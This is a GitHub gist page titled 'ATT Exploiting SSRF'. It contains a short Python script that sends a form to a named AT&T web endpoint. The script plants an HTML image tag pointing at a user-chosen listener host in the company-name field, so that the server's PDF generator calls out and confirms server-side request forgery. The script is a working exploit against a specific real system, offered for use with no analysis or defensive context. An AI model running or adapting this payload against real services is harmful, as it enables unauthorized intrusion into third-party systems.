Skip to content

Instantly share code, notes, and snippets.

@streghstreek
Last active April 23, 2021 12:09
Show Gist options
  • Save streghstreek/0f19b72d229b181b8877bd4a4ea3d6e7 to your computer and use it in GitHub Desktop.
Save streghstreek/0f19b72d229b181b8877bd4a4ea3d6e7 to your computer and use it in GitHub Desktop.
ATT Exploiting SSRF
import requests
url = "https://onlinefaxtwo.att.com/loa.php"
listener = input('Listener address. default port [80]: ')
headers = {'Content-type': 'application/x-www-form-urlencoded'}
data = {'uCompanyName': '<img src="http://' + listener + '">',
'uPersonAuth':'asas',
'uServProvider':'asas',
'uServAddress':'asa',
'uCity':'daniel',
'uState':'NY',
'uZip':'11100',
'uPortNum':'9739018822',
'uBTN':'1212121212',
'cQlc':'on',
'cQit':'on',
'cQic':'on',
'getLOApdf':''}
print("Request should be sent within 10 seconds")
r = requests.post(url, data=data, headers=headers, timeout=10)
print("Check your server LOGS :)")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment